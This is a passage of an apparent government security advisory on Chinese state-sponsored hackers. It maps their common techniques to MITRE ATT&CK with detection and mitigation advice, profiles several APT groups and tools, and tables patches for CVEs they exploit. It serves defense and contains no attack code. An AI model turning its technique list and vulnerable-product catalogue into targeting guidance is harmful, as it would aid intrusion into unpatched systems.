research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity >)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&amp;CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&amp;CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. PRE-ATT&amp;CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&amp;CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&amp;CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&amp;CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. \n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. \n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use NIDS to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment network to protect critical servers and devices. \n_Email Collection _[[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures. \n_Drive-by Compromise _[[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.\n * Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.\n\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Leverage security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad-blockers and script blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.\n| \n\n * Patch vulnerabilities in internet facing applications.\n * Leverage file integrity monitoring to identify file changes.\n * Configure server to block access to the web accessible directory through principle of least privilege. \n_Application Layer Protocol: File Transfer Protocols _[[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3 **(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group\u2019s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10 **(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.\n * **APT41 **(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization\u2019s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders\u2019 attack surface.\n\n 1. **Patch systems and equipment promptly and diligently. **Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities\u2014including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]\u2014have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2020-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2020-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 ](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) 